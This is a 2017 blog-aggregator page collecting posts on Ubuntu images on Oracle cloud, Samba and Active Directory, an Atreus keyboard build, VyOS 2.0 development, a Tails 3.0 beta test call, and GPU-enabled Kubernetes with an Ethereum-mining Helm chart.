I plan to keep the static analysis running long term and I'll try and post stats every 6 months or so to see how things are progressing.

20 April, 2017 12:47PM by Colin Ian King (noreply@blogger.com)

Ubuntu Insights: Certified Ubuntu Images available on Oracle Bare Metal Cloud Service

  • Developers offered options of where to run either demanding workloads or less compute-intensive applications, in a highly available cloud environment.
  • Running development and production on Certified Ubuntu can simplify operations and reduce engineering costs

Certified Ubuntu images are now available in the Oracle Bare Metal Cloud Services, providing developers with compute options ranging from single to 16 OCPU virtual machines (VMs) to high-performance, dedicated bare metal compute instances. This is in addition to the image already offered on Oracle Compute Cloud Service and maintains the ability for enterprises to add Canonical-backed Ubuntu Advantage Support and Systems Management. Oracle and Canonical customers now have access to the latest Ubuntu features, compliance accreditations and security updates.

“Oracle and Canonical have collaborated to ensure the optimal devops experience using Ubuntu on the Oracle Cloud Compute Cloud Service and Bare Metal Cloud Services. By combining the elasticity and ease of deployment on Oracle Cloud Platform, users can immediately reap the benefit of high-performance, high availability and cost-effective infrastructure services,” says Sanjay Sinha, Vice President, Platform Products, Oracle.

“Ubuntu has been growing on Oracle’s Compute Cloud Service, and the same great experience is now available to Enterprise Developers on its Bare Metal Cloud Services,” said Udi Nachmany, Head of Public Cloud at Canonical. “Canonical and Oracle engineering teams will continue to collaborate extensively to deliver a consistent and optimized Ubuntu experience across any relevant Oracle offerings.”

Canonical continually maintains, tests and updates certified Ubuntu images, making the latest versions available on the Oracle Cloud Marketplace within minutes of their official release by Canonical. For all Ubuntu LTS versions, Canonical provides maintenance and security updates for five years.

20 April, 2017 09:02AM

hackergotchi for Univention Corporate Server

Univention Corporate Server

Brief Introduction: Samba / Microsoft Active Directory

In our latest article from our ‘Brief Introduction’ series, we would like to introduce you to the software Samba and Microsoft Active Directory – two solutions for the central detection and authorization of members of a domain. These are very important features as the central administration of a domain network helps to achieve more data protection and higher failure security for your IT systems.

We also like to show you briefly how UCS is able to bridge the gap between the Linux world and the Windows world so that the benefits of both systems can be utilized.

For more information on exactly what a domain is and what tasks a domain controller fulfills, please check our article: Brief Introduction: Domain/Domain Controller

Now let’s go back to the actual topic of this article: the directory service solution Active Directory and the software Samba.


What Exactly is Active Directory and What is it used for?

Active Directory is a solution developed by Microsoft to provide authentication and authorization services in a domain network.

Core Elements of Active Directory

The Active Directory core elements are an LDAP directory service, a Kerberos implementation as well as DNS services. Information on users, groups, and hosts is stored in the directory service. Kerberos assumes the authentication of these users and hosts and DNS (Domain Name System) ensures that client and server systems in this domain network find and can communicate with each other.

These three components LDAP, Kerberos, and DNS are closely interrelated and in order to group them into a single entity, they are called Active Directory Domain Services (AD DS).

As a so-called domain controller, Microsoft Windows Server can provide these Active Directory domain services or join such a domain as a simple member. Also Windows client operating systems can join such a domain (this counts for the respective business and education version).

Resource Allocation and Failure Safety

The contents of the directory service are replicated between the domain controllers of a domain, making them available on multiple systems. This contributes significantly to the failure safety and load distribution of the resources of the domain network. Active Directory uses here a so-called multi-master replication. Changes can thus be made on each individual domain controller and are automatically transferred from there to the other domain controllers.


Samba Software LogoThe Samba project provides a free software suite that enables the interoperability of Linux and Unix-based systems with services and protocols used and developed by Microsoft.

Provision of Windows-Compatible Services

At first, Samba offered the possibility to use file release and print services via the SMB / CIFS used and shaped by Microsoft. This counts both for a server implementation where Samba provides the services on Linux or Unix as for a client implementation that allows Linux and Unix systems to use the services provided by Microsoft Windows.

By the way, the name “Samba” was derived from the protocol name ‘SMB’.

Interoperability through Integrated Services and Protocols

Meanwhile Samba has implemented a variety of services and protocols, including SMB / CIFS, NTLM, WINS / NetBIOS, (MS) RPC, SPOOLSS, DFS, SAM, LSA, and the Windows NT domain model. With version 4.0, Samba was supplemented by an open source implementation of Active Directory.

Samba as an Active Directory Domain Controller

Since then, Samba systems can not only join as members of an Active Directory domain, but also take the role of the domain controller and deploy the Active Directory domain services on a Linux or Unix-based system.

Client systems, such as Windows or Mac OS, can join an Active Directory domain provided by Samba by the same mechanism as a Microsoft Windows Active Directory domain. In addition, group policies can also be used to manage Windows clients.

The Interplay between Samba and UCS

In general, OpenLDAP being the directory service in UCS is the core element that must exist in each UCS domain.

Build a Bridge between the Windows and Linux / Unix World with UCS and Samba


With the app Active Directory-compatible Domain Controller from the Univention App Center, UCS also offers the possibility to run an Active Directory domain via the Samba software suite.

The Univention S4-Connector developed by us synchronizes here all relevant information between the OpenLDAP directory service and the Samba directory service. This interaction makes UCS ideal for unifying the Windows and Linux / Unix world in a single domain network.

The Federal Office for Radiation Protection in Germany, for example, has been using UCS and Samba for years to fully benefit from the advantages of the Linux servers used while the institute’s employees can work with Windows services and clients at their various sites.

We would be pleased to have given you a good insight into the tasks of the directory services Samba and Microsoft Active Directory. If you want to know more about how you can easily combine Microsoft and Linux-based applications in your IT environment with UCS and Samba, please contact us.

To give you further insights into this topic, we recommend the following articles or video tutorials:

Der Beitrag Brief Introduction: Samba / Microsoft Active Directory erschien zuerst auf Univention.

20 April, 2017 08:59AM by Michael Grandjean

hackergotchi for Maemo developers

Maemo developers

Atreus: Building a custom ergonomic keyboard

As mentioned in my Working on Android post, I’ve been using a mechanical keyboard for a couple of years now. Now that I work on Flowhub from home, it was a good time to re-evaluate the whole work setup. As far as regular keyboards go, the MiniLa was nice, but I wanted something more compact and ergonomic.

The Atreus keyboard

My new Atreus

Atreus is a 40% ergonomic mechanical keyboard designed by Phil Hagelberg. It is an open hardware design, but he also sells kits for easier construction. From the kit introduction:

The Atreus is a small mechanical keyboard that is based around the shape of the human hand. It combines the comfort of a split ergonomic keyboard with the crisp key action of mechanical switches, all while fitting into a tiny profile.

My use case was also quite travel-oriented. I wanted a small keyboard that would enable me to work with it also on the road. There are many other small-ish DIY keyboard designs like Planck and Gherkin available, but Atreus had the advantage of better ergonomics. I really liked the design of the Ergodox keyboard, and Atreus essentially is that made mobile:

I found the split halves and relatively large size (which are fantastic for stationary use at a desk) make me reluctant to use it on the lap, at a coffee shop, or on the couch, so that’s the primary use case I’ve targeted with the Atreus. It still has most of the other characteristics that make the Ergodox stand out, like mechanical Cherry switches, staggered columns instead of rows, heavy usage of the thumbs, and a hackable microcontroller with flexible firmware, but it’s dramatically smaller and lighter

I had the opportunity to try a kit-built Atreus in the Berlin Mechanical Keyboard meetup, and it felt nice. It was time to start the project.

Sourcing the parts

When building an Atreus the first decision is whether to go with the kit or hand-wire it yourself. Building from a kit is certainly easier, but since I’m a member of a hackerspace, doing a hand-wired build seemed like the way to go.

To build a custom keyboard, you need:

  • Switches: in my case 37 Cherry MX blues and 5 Cherry MX blacks
  • Diodes: one 1N4148 per switch
  • Microcontroller: a Arduino Pro Micro on my keyboard
  • Keycaps: started with recycled ones and later upgraded to DSA blanks
  • Case: got a set of laset-cut steel plates

Even though Cherry — the maker of the most common mechanical key switches — is a German company, it is quite difficult to get switches in retail here. Luckily a fellow hackerspace member had just dismantled some old mechanical keyboards, and so I was able to get the switches I needed via barter.


The Cherry MX blues are tactile clicky switches that feel super-nice to type on, but are quite loud. For modifiers I went with Cherry MX blacks that are linear. This way there is quite a clear difference in feel between keys you typically hold down compared to the ones you just press.

The diodes and the microcontroller I ordered from Amazon for about 20€ total.

Arduino Pro Micro

At first I used a set of old keycaps that I got with the switches, but once the keyboard was up and running I upgraded to a very nice set of blank DSA-profile keycaps that I ordered from AliExpress for 30€. That set came with enough keycaps that I’ll have myself covered if I ever build a second Atreus.

All put together, I think the parts ended up costing me around 100€ total.


When I received all the parts, there were some preparation steps to be made. Since the key switches were 2nd hand, I had to start by dismantling them and removing old diodes that had been left inside some of them.

Opening the key switches

The keycaps I had gotten with the switches were super grimy, and so I ended up sending them to the washing machine. After that you could see that they were not new, but at least they were clean.

With the steel mounting plate there had been a slight misunderstading, and the plates I received were a few millimeters thicker than needed, so the switches wouldn’t “click” in place. While this could’ve been worked around with hot glue, we ended up filing the mounting holes down to the right thickness.

Filing the plate

Little bit of help

Wiring the keyboard

Once the mounting plate was in the right shape, I clicked the switches in and it was time to solder.

All switches in place

Hand-wiring keyboards is not that tricky. You have to attach a diode to each keyswitch, and then connect each row together via the diodes.

Connecting diodes

First row ready

The two thumb keys are wired to be on the same column, but different rows.

All rows ready diodes

Then each column is connected together via the other pin on the switches.

Soldering columns

This is how the matrix looks like:

Completed matrix

After these are done, connect a wire from each column, and each row to a I/O pin on the microcontroller.

Adding column wires

If you haven’t done it earlier, this is a good stage to test all connections with a multimeter!

Connecting the microcontroller


After finishing the wiring, I downloaded the QMK firmware, changed the PIN mapping for how my Atreus is wired up, switched the layout to Colemak, and the keyboard was ready to go.

Atreus in use

Don’t mind the key labels in the picture above. These are the second-hand keycaps I started with. Since then I’ve switched to blank ones.


The default Atreus design has the USB cable connected directly to the microcontroller, meaning that you’ll have to open the case to change the cable. To mitigate that I wanted to add a USB breakout board to the project, and this being 2017, it felt right to go with USB-C.

USB-C breakouts

I found some cheap USB-C breakout boards from AliExpress. Once they arrived, it was time to figure out how the spec works. Since USB-C is quite new, there are very few resources available on how to use it with microcontrollers. These tutorials were quite helpful:

Here is how we ended up wiring the breakout board. After these you only have four wires to connect to the microcontroller: ground, power, and the positive and negative data pins.

USB-C breakout with wiring

This Atreus build log was useful for figuring out where to connect the USB wires on the Pro Micro. Once all was done, I had a custom, USB-C keyboard!

USB-C keyboard

Next steps

Now I have the Atreus working nicely on my new standing desk. Learning Colemak is a bit painful, but the keyboard itself feels super nice!

New standing desk

However, I’d still like to CNC mill a proper wooden case for the keyboard. I may update this post once that happens.

I’m also considering to order an Atreus kit so I’d have a second, always packed for travel keyboard. The kit comes with a PCB, which might work better at airport security checks than the hand-wired build.

Another thing that is quite tempting is to make a custom firmware with MicroFlo. I have no complaints on how QMK works, but it’d be super-cool to use our visual programming tool to tweak the keyboard live.

Big thanks to Technomancy for the Atreus design, and to XenGi for all the help during the build!

0 Add to favourites0 Bury

20 April, 2017 12:00AM by Henri Bergius (henri.bergius@iki.fi)

April 19, 2017

hackergotchi for VyOS


VyOS 2.0 development digest #9: socket communication functionality, complete parser, and open tasks

Socket communication

A long-awaited (by me, anyway ;) milestone: VyConf is now capable of communicating with clients. This allows us to write a simple non-interactive client. Right now the only supported operaion is "status" (a keepalive of sorts), but the list will be growing.

I guess I should talk about the client before going into technical details of the protocol. The client will be way easier to use than what we have now. Two main problems with CLI tools from VyOS 1.x is that my_cli_bin (the command used by set/delete operations) requires a lot of environment setup, and that cli-shell-api is limited in scope. Part of the reason for this is that my_cli_bin is used in the interactive shell. Since the interactive shell of VyConf will be a standalone program rather than a bash completion hack, we are free to make the non-interactive client more idiomatic as a shell command, closer in user experience to git or s3cmd.

This is what it will look like:

SESSION=$(vycli setupSession)
vycli --session=$SESSION configure
vycli --session=$SESSION set "system host-name vyos"
vycli --session=$SESSION delete "system name-server"
vycli --session=$SESSION commit
vycli --session=$SESSION exists "service dhcp-server"
vycli --session=$SESSION commit returnValue "system host-name"
vycli --session=$SESSION --format=json show "interfaces ethernet"

As you can see, first, the top level words are subcommands, much like "git branch". Since the set of top level words is fixed anyway, this doesn't create new limitations. Second, the same client can execute both high level set/delete/commit operations and low level exists/returnValue/etc. methods. Third, the only thing it needs to operate is a session token (I'm thinking that unless it's passed in --session option, vycli should try to get it from an environment variable, but we'll see, let me know what you think about this issue). This way contributors will get an easy way to test the code even before interactive shell is complete; and when VyOS 2.0 is usable, shell scripts and people fond of working from bash rather than the domain-specific shell will have access to all system functions, without worrying about intricate environment variable setup.

The protocol

As I already said in the previous post, VyConf uses Protobuf for serialized messages. Protobuf doesn't define any framing, however, so we have to come up with something. Most popular options are delimiters and length headers. The issue with delimiters is that you have to make sure they do not appear in user input, or you risk losing a part of the message. Some programs choose to escape delimiters, other rely on unusual sequences, e.g. the backend of OPNSense uses three null bytes for it. Since Protobuf is a binary protocol, no sequence is unusual enough, so length headers look like the best option. VyConf uses 4 byte headers in network order, that are followed by a Protobuf message. This is easy enough to implement in any language, so it shouldn't be a problem when writing bindings for other languages.

The code

There is a single client library that can be used by all of the non-interactive client and the interactive shell. It will also serve as the OCaml bindings package for VyConf (Python and other languages wil need their own bindings, but with Protobuf, most of it can be autogenerated).

Parser improvements

Inactive and ephemeral nodes

The curly config parser is now complete. It supports the inactive and ephemeral properties. This is what a config with those will look like:

protocols {
  static {
    /* Inserted by a fail2ban-like script */
    #EPHEMERAL route {
    /* DIsabled by admin */
    #INACTIVE route {

While I'm not sure if there are valid use cases for it, nodes can be inactive and ephemeral at the same time. Deactivating an ephemeral node that was created by scritp perhaps? Anyway, since both are a part of the config format that the "show" command will produce, we get to support both in the parser too.

Multi nodes

By multi nodes I mean nodes that may have more than one value, such as "address" in interfaces. As you remember, I suggested and implemented a new syntax for such nodes:

interfaces {
  ethernet eth0 {
    address [;;

However, the parser now supports the original syntax too, that is:.

interfaces {
  ethernet eth0 {

I didn't intend to support it originally, but it was another edge case that prompted me to add it. For config read operations to work correctly, every path in the tree must be unique. The high level Config_tree.set function maintains this invariant, but the parser gets to use lower level primitives that do not, so if a user creates a config with duplicate nodes, e.g. by careless pasting, the config tree that the parser returns will have them too, so we get to detect such situations and do something about it. Configs with duplicate tag nodes (e.g. "ethernet eth0 { ... } ethernet eth0 { ... }") are rejected as incorrect since there is no way to recover from this. Multiple non-leaf nodes with distinct children (e.g. "system { host-name vyos; } system { name-server; }") can be merged cleanly, so I've added some code to merge them by moving children of subsequent nodes under the first on and removing the extra nodes afterwards. However, since in the raw config there is no real distinction between leaf and non-leaf nodes, so in case of leaf nodes that code would simply remove all but the first. I've extended it to also move values into the first node, which equates support for the old syntax, except node comments and inactive/ephemeral properties will be inherited from the first node. Then again, this is how the parser in VyOS 1.x behaves, so nothing is lost.

While the show command in VyOS 2.0 will always use the new syntax with curly brackets, the parser will not break the principle of least astonishment for people used to the old one. Also, if we decide to write a migration utility for converting 1.x configs to 2.0, we'll be able to reuse the parser, after adding semicolons to the old config with a simple regulat expression perhaps.


Node names and unquoted values now can contain any characters that are not reserved, that is, anything but whitespace, curly braces, square brackets, and semicolons.

What's next?

Next I'm going to work on adding low level config operations (exists/returnValue/...) and set commands so that we can do some real life tests.

There's a bunch of open tasks if you want to join the development:

T254 is about preventing nodes with reserved characters in their names early in the process, at the "set" time. There's a rather nasty bug in VyOS 1.1.7 related to this: you can pass a quoted node name with spaces to set and if there is no validation rule attached to the node, as it's with "vpn l2tp remote-access authentication local-users", the node will be created. It will fail to parse correctly after you save and reload the config. We'll fix it in 1.2.0 of course, but we also need to prevent it from ever appearing in 2.0 too.

T255 is about adding the curly config renderer. While we can use the JSON serializer for testing right now, the usual format is also just easier on the eyes, and it's a relatively simple task too.

19 April, 2017 09:19PM by Daniil Baturin

hackergotchi for Tails


Call for testing: 3.0~beta4

You can help Tails! The fourth beta for the upcoming version 3.0 is out. We are very excited and cannot wait to hear what you think about it :)

What's new in 3.0~beta4?

Tails 3.0 will be the first version of Tails based on Debian 9 (Stretch). As such, it upgrades essentially all included software.

Other changes since Tails 3.0~beta3 include:

  • Important security fixes!

  • All changes brought by Tails 2.12.

  • Upgrade to current Debian 9 (Stretch).

  • Many bug fixes in Tails Greeter.

  • Fix the ORCA screen reader.

  • Replace Pidgin's "systray" icon with the guifications plugin.

Technical details of all the changes are listed in the Changelog.

How to test Tails 3.0~beta4?

We will provide security updates for Tails 3.0~beta4, just like we do for stable versions of Tails.

But keep in mind that this is a test image. We tested that it is not broken in obvious ways, but it might still contain undiscovered issues.

But test wildly!

If you find anything that is not working as it should, please report to us on tails-testers@boum.org.

Bonus points if you first check if it is a known issue of this release or a longstanding known issue.

Get Tails 3.0~beta4

To upgrade, an automatic upgrade is available from 3.0~beta2 and 3.0~beta3 to 3.0~beta4.

If you cannot do an automatic upgrade, you can install 3.0~beta4 by following our usual installation instructions, skipping the Download and verify step.

Tails 3.0~beta4 ISO image OpenPGP signature

Known issues in 3.0~beta4

  • The documentation has only been partially updated so far.

  • The graphical interface fails to start on some Intel graphics adapters. If this happens to you:

    1. Add the xorg-driver=intel option in the boot menu.
    2. If this fixes the problem, report to to tails-testers@boum.org the output of the following commands:

      lspci -v
      lspci -mn

      … so we get the identifier of your graphics adapter and can have this fix applied automatically in the next Tails 3.0 pre-release.

    3. If this does not fix the problem, try Troubleshooting Mode and report the problem to tails-testers@boum.org. Include the exact model of your Intel graphics adapter.
  • There is no Read-Only feature for the persistent volume anymore; it is not clear yet whether it will be re-introduced in time for Tails 3.0 final (#12093).

  • Open tickets for Tails 3.0~rc1

  • Open tickets for Tails 3.0

  • Longstanding known issues

What's coming up?

We will likely publish the first release candidate for Tails 3.0 around May 19.

Tails 3.0 is scheduled for June 13.

Have a look at our roadmap to see where we are heading to.

We need your help and there are many ways to contribute to Tails (donating is only one of them). Come talk to us!

19 April, 2017 06:50PM

hackergotchi for VyOS


VyOS 1.2.0 repository re-structuring

In preparation for the new 1.2.0 (jessie-based) beta release, we are re-populating the package repositories. The old repositories are now archived, you still can find then in the /legacy/repos directory on dev.packages.vyos.net

The purpose of this is two-fold. First, the old repo got quite messy, and Debian people (rightfully!) keep reminding us about it, but it would be difficult to do a gradual cleanup. Second, since the CI server has moved, and so did the build hosts, we need to test how well the new procedures are working. And, additionally, it should tell us if we are prepared to restore VyOS from its source should anything happen to the packages.vyos.net server or its contents.

For perhaps a couple of days, there will be no new nightly builds, and you will not be able to build ISOs yourself, unless you change the repo path in ./configure options by hand. Stay tuned.

19 April, 2017 06:31PM by Daniil Baturin

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Insights: How we commoditized GPUs for Kubernetes

[Edit 2017-04-20] A careful reader informed me (thanks for that HN user puzzle) that it is no longer required to run in privileged mode to access the GPUs in K8s. I therefore removed a note that previously stated this requirement, and am in the process of updating my Helm charts to remove it as well from there. 

Over the last 4 months I have blogged 4 times about the enablement of GPUs in Kubernetes. Each time I did so, I spent several days building and destroying clusters until it was just right, making the experience as fluid as possible for adventurous readers.

It was not the easiest task as the environments were different (cloud, bare metal), the hardware was different (g2.xlarge have old K20s, p2 instances have K80s, I had 1060GTX at home but on consumer grade Intel NUC…). As a result, I also spent several hours supporting people to set up clusters. Usually with success, but I must admit some environments have been challenging.

Thankfully the team at Canonical in charge of developing the Canonical Distribution of Kubernetes have productized GPU integration and made it so easy to use that it would just be a shame not to talk about it.

And as of course happiness never comes alone, I was lucky enough to be allocated 3 brand new, production grade Pascal P5000 by our nVidia friends. I could have installed these in my playful rig to replace the 1060GTX boards. But this would have showed little gratitude for the exceptional gift I received from nVidia. Instead, I decided to go for a full blown “production grade” bare metal cluster, which will allow me to replicate most of the environments customers and partners have. I chose to go for 3x Dell T630 servers, which can be GPU enabled and are very capable machines. I received them a couple of week ago, and…

Please don’t mind the cables, I don’t have a rack…There we are! Ready for some awesomeness?

What it was in the past

If you remember the other posts, the sequence was:

  1. Deploy a “normal” K8s cluster with Juju;
  2. Add a CUDA charm and relate it to the right group of Kubernetes workers;
  3. Connect on each node, and activate privileged containers, and add the experimental-nvidia-gpu tag to the kubelet. Restart kubelet;
  4. Connect on the API Server, add the experimental-nvidia-gpu tag and restart the API server;
  5. Test that the drivers were installed OK and made available in k8s with Juju and Kubernetes commands.

Overall, on top of the Kubernetes installation, with all the scripting in the world, no less than 30 to 45min were lost to perform the specific maintenance for GPU enablement.
It is better than having no GPUs, but it is often too much for the operators of the clusters who want an instant solution.

How is it now?

I am happy to say that the requests of the community have been heard loud and clear. As of Kubernetes 1.6.1, and the matching GA release of the Canonical Distribution of Kubernetes, the new experience is :

  1. Deploy a normal K8s cluster with Juju

Yes, you read that correctly. Single command deployment of GPU-enabled Kubernetes Cluster

Since 1.6.1, the charms will now:

  • watch for GPU availability every 5min. For clouds like GCE, where GPUs can be added on the fly to instances, this makes sure that no GPU will ever be forgotten;
  • If one or more GPUs are detected on a worker, the latest and greatest CUDA drivers will be installed on the node, the kubelet reconfigured and restarted automagically;
  • Then the worker will communicate its new state to the master, which will in return also reconfigure the API server and accept GPU workloads;
  • In case you have a mixed cluster with some nodes with GPUs and others without, only the right nodes will attempt to install CUDA and accept privileged containers.

You don’t believe me? Fair enough. Watch me…


For the following, you’ll need:

  • Basic understanding of the Canonical toolbox: Ubuntu, Juju, MAAS…
  • Basic understanding of Kubernetes
  • A little bit of Helm at the end

and for the files, cloning the repo:

git clone https://github.com/madeden/blogposts
cd blogposts/k8s-ethereum

Putting it to the test

In the cloud

Deploying in the cloud is trivial. Once Juju is installed and your credentials are added,

juju bootstrap aws/us-east-1 
juju deploy src/bundles/k8s-1cpu-3gpu-aws.yaml
watch -c juju status --color

Now wait…

Model    Controller     Cloud/Region   Version
default  aws-us-east-1  aws/us-east-1  2.2-beta2

App                    Version  Status       Scale  Charm              Store       Rev  OS      Notes
easyrsa                3.0.1    active           1  easyrsa            jujucharms    8  ubuntu
etcd                   2.3.8    active           1  etcd               jujucharms   29  ubuntu
flannel                0.7.0    active           2  flannel            jujucharms   13  ubuntu
kubernetes-master      1.6.1    waiting          1  kubernetes-master  jujucharms   17  ubuntu  exposed
kubernetes-worker-cpu  1.6.1    active           1  kubernetes-worker  jujucharms   22  ubuntu  exposed
kubernetes-worker-gpu           maintenance      3  kubernetes-worker  jujucharms   22  ubuntu  exposed

Unit                      Workload     Agent      Machine  Public address  Ports           Message
easyrsa/0*                active       idle       0/lxd/0                    Certificate Authority connected.
etcd/0*                   active       idle       0   2379/tcp        Healthy with 1 known peer
kubernetes-master/0*      waiting      idle       0   6443/tcp        Waiting for kube-system pods to start
  flannel/0*              active       idle                         Flannel subnet
kubernetes-worker-cpu/0*  active       idle       1  80/tcp,443/tcp  Kubernetes worker running.
  flannel/1               active       idle                        Flannel subnet
kubernetes-worker-gpu/0   maintenance  executing  2                  (install) Installing CUDA
kubernetes-worker-gpu/1   maintenance  executing  3                   (install) Installing CUDA
kubernetes-worker-gpu/2*  maintenance  executing  4                  (install) Installing CUDA

Machine  State    DNS             Inst id              Series  AZ          Message
0        started   i-0d71d98b872d201f5  xenial  us-east-1a  running
0/lxd/0  started    juju-29e858-0-lxd-0  xenial              Container started
1        started  i-04f2b75f3ab88f842  xenial  us-east-1a  running
2        started  i-0113e8a722778330c  xenial  us-east-1a  running
3        started   i-07c8c81f5e4cad6be  xenial  us-east-1a  running
4        started  i-00ae437291c88210f  xenial  us-east-1a  running

Relation      Provides               Consumes               Type
certificates  easyrsa                etcd                   regular
certificates  easyrsa                kubernetes-master      regular
certificates  easyrsa                kubernetes-worker-cpu  regular
certificates  easyrsa                kubernetes-worker-gpu  regular
cluster       etcd                   etcd                   peer
etcd          etcd                   flannel                regular
etcd          etcd                   kubernetes-master      regular
cni           flannel                kubernetes-master      regular
cni           flannel                kubernetes-worker-cpu  regular
cni           flannel                kubernetes-worker-gpu  regular
cni           kubernetes-master      flannel                subordinate
kube-dns      kubernetes-master      kubernetes-worker-cpu  regular
kube-dns      kubernetes-master      kubernetes-worker-gpu  regular
cni           kubernetes-worker-cpu  flannel                subordinate
cni           kubernetes-worker-gpu  flannel                subordinate

I was able to capture the moment where it is installing CUDA so you can see it… When it’s done:

juju ssh kubernetes-worker-gpu/0 "sudo nvidia-smi"
Tue Apr 18 08:50:23 2017       
| NVIDIA-SMI 375.51                 Driver Version: 375.51                    |
| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
|   0  Tesla K80           Off  | 0000:00:1E.0     Off |                    0 |
| N/A   52C    P0    67W / 149W |      0MiB / 11439MiB |     98%      Default |
| Processes:                                                       GPU Memory |
|  GPU       PID  Type  Process name                               Usage      |
|  No running processes found                                                 |
Connection to closed.

That’s it, you can see the K80 from the p2.xlarge instance. I didn’t do anything about it, it was completely automated. This is Kubernetes on GPU steroids.


On Bare Metal

Obviously there is a little more to do on Bare Metal, and I will refer you to my previous posts to understand how to set MAAS up & running. This assumes it is already working.

Adding the T630 to MAAS is a breeze. If you don’t change the default iDRAC username password (root/calvin), the only thing you have to do it connect them to a network (a specific VLAN for management is preferred of course), set the IP address, and add to MAAS with an IPMI Power type.

Adding the nodes into MAASThen commission the nodes as you would with any other. This time, you won’t need to press the power button like I had to with the NUC cluster: MAAS will trigger via the IPMI card directly, request a PXE boot, and register the node, all fully automagically. Once that is done, tag them “gpu” to make sure to recognize them.

Details about the T630 in MAAS


juju bootstrap maas
juju deploy src/bundles/k8s-1cpu-3gpu.yaml
watch -c juju status --color

Wait for a few minutes… You will see at some point that the charm is now installing CUDA drivers. At the end,

Model    Controller  Cloud/Region  Version
default  k8s         maas

App                    Version  Status  Scale  Charm              Store       Rev  OS      Notes
easyrsa                3.0.1    active      1  easyrsa            jujucharms    8  ubuntu
etcd                   2.3.8    active      1  etcd               jujucharms   29  ubuntu
flannel                0.7.0    active      5  flannel            jujucharms   13  ubuntu
kubernetes-master      1.6.1    active      1  kubernetes-master  jujucharms   17  ubuntu  exposed
kubernetes-worker-cpu  1.6.1    active      1  kubernetes-worker  jujucharms   22  ubuntu  exposed
kubernetes-worker-gpu  1.6.1    active      3  kubernetes-worker  jujucharms   22  ubuntu  exposed

Unit                      Workload  Agent  Machine  Public address  Ports           Message
easyrsa/0*                active    idle   0/lxd/0                      Certificate Authority connected.
etcd/0*                   active    idle   0      2379/tcp        Healthy with 1 known peer
kubernetes-master/0*      active    idle   0      6443/tcp        Kubernetes master running.
  flannel/1               active    idle                        Flannel subnet
kubernetes-worker-cpu/0*  active    idle   1      80/tcp,443/tcp  Kubernetes worker running.
  flannel/0*              active    idle                        Flannel subnet
kubernetes-worker-gpu/0   active    idle   2      80/tcp,443/tcp  Kubernetes worker running.
  flannel/2               active    idle                        Flannel subnet
kubernetes-worker-gpu/1   active    idle   3      80/tcp,443/tcp  Kubernetes worker running.
  flannel/4               active    idle                        Flannel subnet
kubernetes-worker-gpu/2*  active    idle   4      80/tcp,443/tcp  Kubernetes worker running.
  flannel/3               active    idle                        Flannel subnet

Machine  State    DNS         Inst id              Series  AZ
0        started  br68gs               xenial  default
0/lxd/0  started  juju-5a80fa-0-lxd-0  xenial
1        started  qkrh4t               xenial  default
2        started  4y74eg               xenial  default
3        started  w3pgw7               xenial  default
4        started  se8wy7               xenial  default

Relation      Provides               Consumes               Type
certificates  easyrsa                etcd                   regular
certificates  easyrsa                kubernetes-master      regular
certificates  easyrsa                kubernetes-worker-cpu  regular
certificates  easyrsa                kubernetes-worker-gpu  regular
cluster       etcd                   etcd                   peer
etcd          etcd                   flannel                regular
etcd          etcd                   kubernetes-master      regular
cni           flannel                kubernetes-master      regular
cni           flannel                kubernetes-worker-cpu  regular
cni           flannel                kubernetes-worker-gpu  regular
cni           kubernetes-master      flannel                subordinate
kube-dns      kubernetes-master      kubernetes-worker-cpu  regular
kube-dns      kubernetes-master      kubernetes-worker-gpu  regular
cni           kubernetes-worker-cpu  flannel                subordinate
cni           kubernetes-worker-gpu  flannel                subordinate

And now:

juju ssh kubernetes-worker-gpu/0 "sudo nvidia-smi"
Tue Apr 18 06:08:35 2017       
| NVIDIA-SMI 375.51                 Driver Version: 375.51                    |
| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
|   0  GeForce GTX 106...  Off  | 0000:04:00.0     Off |                  N/A |
| 28%   37C    P0    28W / 120W |      0MiB /  6072MiB |      0%      Default |
|   1  Quadro P5000        Off  | 0000:83:00.0     Off |                  Off |
|  0%   43C    P0    39W / 180W |      0MiB / 16273MiB |      2%      Default |
| Processes:                                                       GPU Memory |
|  GPU       PID  Type  Process name                               Usage      |
|  No running processes found                                                 |

That’s it, my 2 cards are in there: 1060GTX and P5000. Again, no user interaction. How awesome is this?

Note that the interesting aspects are not only that it automated the GPU enablement, but also that the bundle files (the yaml content) are essentially the same, but for the machine constraints we set.

Having some fun with GPUs

If you follow me you know I’ve been playing with Tensorflow, so that would be a use case, but I actually wanted to get some raw fun with them! One of my readers mentioned bitcoin mining once, so I decided to go for it.

I made a quick and dirty Helm Chart for an Ethereum Miner, along with a simple rig monitoring system called ethmon.

This chart will let you configure how many nodes, and how many GPU per node you want to use. Then you can also tweak the miner. For now, it only works in ETH only mode. Don’t forget to create a values.yaml file to

  • add your own wallet (if you keep the default you’ll actually pay me, which is fine 🙂 but not necessarily your purpose),
  • update the ingress xip.io endpoint to match the public IP of one of your workers or use your own DNS
  • Adjust the number of workers and GPUs per node


cd ~
git clone https://github.com/madeden/charts.git
cd charts
helm init
helm install claymore --name claymore --values /path/to/yourvalues.yaml

By default, you’ll get the 3 worker nodes, with 2 GPUs (this is to work on my rig at home)

KubeUI with the miners deployed
Monitoring interface (ethmon)You can also track it here with nice graphs.

What did I learn from it? Well,

  • I really need to work on my tuning per card here! The P5000 and the 1060GTX have the same performances, and they also are the same as my Quadro M4000. This is not right (or there is a cap somewhere). But I’m a newbie, I’ll get better.
  • It’s probably not worth it money wise. This would make me less than $100/month with this cluster, less than my electricity bill to run it.
  • There is a LOT of room for Monero mining on the CPU! I run at less than a core for the 6 workers.
  • I’ll probably update it to run less workers, but with all the GPUs allocated to them.
  • But it was very fun to make. And now apparently I need to do “monero”, which is supposedly ASIC resistent and should be more profitable. Stay tuned 😉


3 months ago, I recognize running Kubernetes with GPUs wasn’t a trivial job. It was possible, but you needed to really want it.

Today, if you are looking for CUDA workloads, I challenge you to find anything easier than the Canonical Distribution of Kubernetes to run that, on Bare Metal or in the cloud. It is literally so trivial to make it work that it’s boring. Exactly what you want from infrastructure.

GPUs are the new normal. Get used to it.

So, let me know of your use cases, and I will put this cluster to work on something a little more useful for mankind than a couple of ETH!

